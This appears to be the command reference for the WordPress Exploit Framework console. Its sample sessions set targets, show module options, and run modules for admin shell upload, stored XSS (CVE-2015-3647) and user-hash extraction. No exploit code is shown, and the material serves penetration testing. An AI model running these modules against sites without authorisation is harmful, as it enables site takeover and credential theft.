Supported Commands
Changes the context of the session back to before loading the current module.
wpxf [exploit/admin_shell_upload] > back
wpxf >
Check if the currently loaded module can be used against the specified target.
wpxf [exploit/admin_shell_upload] > check
[!] Target appears to be vulnerable
wpxf [exploit/admin_shell_upload] >
Clear the screen.
Set an option value globally, so that the current module and all modules loaded afterwards will use the specified value for the specified option.
wpxf > gset host wp-sandbox
[+] Globally set the value of host to wp-sandbox
wpxf > use exploit/admin_shell_upload
[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3578af0>
wpxf [exploit/admin_shell_upload] > show options
Module options:
Name                Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host                wp-sandbox      true     Address of the target host.
http_client_timeout 5               true     Max wait time in seconds for HTTP responses
password                            true     The WordPress password to authenticate with
port                80              true     Port the remote host is listening on
proxy                               false    Proxy address ([protocol://]host:port)
ssl                 false           true     Use SSL/HTTPS for all requests
target_uri          /               true     Base path to the WordPress application
username                            true     The WordPress username to authenticate with
verbose             false           true     Enable verbose output
vhost                               false    HTTP server virtual host
wpxf [exploit/admin_shell_upload] >
Unset a global option set with the gset command.
wpxf > gunset host
[+] Removed the global setting for host
wpxf >
Display information about the currently loaded module.
wpxf [exploit/photo_album_plus_stored_xss] > info
Name: Photo Album Plus 6.1.2 XSS Shell Upload
Module: exploit/photo_album_plus_stored_xss
Disclosed: 2015-05-20
Provided by:
High-Tech Bridge Security Research Lab
Rob Carr <rob[at]rastating.com>
Module options:
Name                     Current Setting Required Description
------------------------ --------------- -------- --------------------------------------------------
host                                     true     Address of the target host.
http_server_bind_address 0.0.0.0         true     Address to bind the HTTP server to
http_server_bind_port    80              true     Port for the HTTP server to listen on
port                     80              true     Port the remote host is listening on
proxy                                    false    Proxy address ([protocol://]host:port)
ssl                      false           true     Use SSL/HTTPS for all requests
target_uri               /               true     Base path to the WordPress application
verbose                  false           true     Enable verbose output
vhost                                    false    HTTP server virtual host
xss_host                                 true     The address of the host listening for a connection
xss_path                 qdwuytOZ        true     The path to access via the cross-site request
Description:
The vulnerability exists due to the absence of filtration of user-supplied
input passed via the "comname" and "comemail" HTTP POST parameters to
"/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when
posting a comment.
A remote attacker can post a specially crafted message containing malicious
HTML or script code and execute it in the administrator's browser in context
of the vulnerable website, when an administrator views images or comments in
the administrative interface.
References:
http://www.cvedetails.com/cve/2015-3647
https://wpvulndb.com/vulnerabilities/7996
https://www.htbridge.com/advisory/HTB23257
wpxf [exploit/photo_album_plus_stored_xss] >
Exit the WordPress Exploit Framework prompt.
Run the currently loaded module.
wpxf [auxiliary/ultimate_csv_importer_user_extract] > run
[-] Requesting CSV extract...
[-] Parsing response...
Username Password Hash                      E-mail
-------- ---------------------------------- ------------------
user1    $P$B0zehiQs.vYn9ieCHPHlyumkeqW7vp1 user1@host
user2    $P$BseKx4lY7o.lB.pIsajFDkXTMPiubV. user2@host
[+] Execution finished successfully
wpxf [auxiliary/ultimate_csv_importer_user_extract] >
Set an option value for the currently loaded module.
wpxf [exploit/admin_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/admin_shell_upload] >
Search for modules that contain one or more of the specified keywords.
wpxf > search privilege escalation
[+] 2 Results for "privilege escalation"
Module                                   Title
---------------------------------------- ------------------------------------
auxiliary/easy_cart_privilege_escalation EasyCart Plugin Privilege Escalation
auxiliary/wplms_privilege_escalation     WPLMS Theme Privilege Escalation
wpxf >
Show the options or advanced options for the currently loaded module.
wpxf [exploit/admin_shell_upload] > show options
Module options:
Name                Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host                wp-sandbox      true     Address of the target host.
http_client_timeout 5               true     Max wait time in seconds for HTTP responses
password                            true     The WordPress password to authenticate with
port                80              true     Port the remote host is listening on
proxy                               false    Proxy address ([protocol://]host:port)
ssl                 false           true     Use SSL/HTTPS for all requests
target_uri          /               true     Base path to the WordPress application
username                            true     The WordPress username to authenticate with
verbose             false           true     Enable verbose output
vhost                               false    HTTP server virtual host
wpxf [exploit/admin_shell_upload] >
wpxf [exploit/admin_shell_upload] > show advanced
Name: basic_auth_creds
Current setting:
Required: false
Description: HTTP basic auth credentials (username:password)
Name: follow_http_redirection
Current setting: true
Required: true
Description: Automatically follow HTTP redirections
Name: max_http_concurrency
Current setting: 20
Required: true
Description: Max number of HTTP requests that can be made in parallel (Min: 1, Max: 200)
Name: proxy_auth_creds
Current setting:
Required: false
Description: Proxy server credentials (username:password)
Name: user_agent
Current setting: Mozilla/5.0 (Macintosh; U; U; Intel Mac OS X 10_7_6 rv:6.0; en-US) AppleWebKit/533.49.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.49.6
Required: false
Description: The user agent string to send with all requests
Name: verify_host
Current setting: true
Required: true
Description: Enable host verification when using HTTPS
Name: wp_content_dir
Current setting: wp-content
Required: true
Description: The name of the wp-content directory.
wpxf [exploit/admin_shell_upload] >
Unset an option set with the set command.
wpxf [exploit/admin_shell_upload] > unset host
[+] Unset host
wpxf [exploit/admin_shell_upload] >
Loads the specified module into the current context and enables the show, info, set, unset, check and run commands.
wpxf > use exploit/admin_shell_upload
[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3af1100>
wpxf [exploit/admin_shell_upload] > show options
Module options:
Name                Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host                                true     Address of the target host.
http_client_timeout 5               true     Max wait time in seconds for HTTP responses
password                            true     The WordPress password to authenticate with
port                80              true     Port the remote host is listening on
proxy                               false    Proxy address ([protocol://]host:port)
ssl                 false           true     Use SSL/HTTPS for all requests
target_uri          /               true     Base path to the WordPress application
username                            true     The WordPress username to authenticate with
verbose             false           true     Enable verbose output
vhost                               false    HTTP server virtual host
wpxf [exploit/admin_shell_upload] >